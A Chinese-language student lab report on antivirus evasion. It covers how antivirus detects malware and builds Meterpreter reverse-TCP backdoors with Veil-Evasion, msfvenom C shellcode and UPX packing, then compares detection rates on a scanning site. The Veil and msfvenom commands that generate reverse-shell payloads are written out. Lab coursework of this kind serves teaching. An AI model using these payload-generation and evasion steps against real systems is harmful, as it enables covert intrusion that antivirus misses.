一、基礎問題回答

（1）殺軟是如何檢測出惡意代碼的？

-檢測特征碼

-基於行為檢測

-啟發式檢測類似

（2）免殺是做什麽？

使惡意軟件不被AV檢測出來

（3）免殺的基本方法有哪些？

改變特征碼。

改變行為方式。

二.開始實驗

1.原始的後門程序

將上此實驗產生的後門文件直接拷貝到win主機下（我的殺毒軟件是騰訊管家）

添加信任以後放在 http://www.virscan.org/上掃描，由於文件名不被允許，我改成了自己的名字，下圖是結果。

2.veil-evasion版本

Veil-Evasion是一個與Metasploit有點類似的軟件，已經在kali虛擬機裏，如果沒有可以進行在線安裝：sudo apt-get install veil-evasion，我的kali虛擬機安裝失敗，求助了很多同學也沒有解決的辦法，只好用舍友的電腦來做。

在終端下輸入指令veil-evasion即可打開軟件，根據menu的提示依次鍵入以下指令：

use python/meterpreter/rev_tcp //設置payload
set LHOST 192.168.120.129 //設置反彈連接IP（kali的ip）
set port 4303 //設置反彈端口4318
generate //生成
4303 //程序名

該可執行文件存在kali計算機的/var/lib/veil-evasion/output/compiled/文件夾裏，點擊places的fengjia即可找到相應的文件夾：

同樣的，我們放到該網站上掃描

3.C語言調用Shellcode版本

在Kali下生成一個C語言格式的shellcode數組，回連的IP為Kali的IP，端口自定。

輸入代碼msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.72.128 LPORT=4303 -f c

在DEV C++中編譯運行exe,在網站上掃描一下。嘗試回連，並成功。

這個報毒率已經比較低了。

4.C調用升級版本加殼壓縮殼UPX直接用upx將MSF直接生成的文件加殼。

在網站上掃描

居然是安全的文件！

接下來是我的電腦管家對三個文件的掃描結果

三.距離實戰還有那些距離和技術？

我們如何穩定的監聽目標主機的活動，就算是考慮周全的病毒也還是有被發現的可能，這是個問題。

四.實驗感想

這次實驗我很失落，因為我安裝veil的過程中總是出現問題，我更換了源文件也沒用，只好用舍友的電腦做。通過這次實驗我清楚認識到了電腦被入侵是多麽容易的一件事。這更加提高了保護自己電腦的警惕心，因為殺毒軟件也不是絕對安全的。難以想象那些專業黑客入侵我們電腦是多麽容易。

Exp3 免殺原理與實踐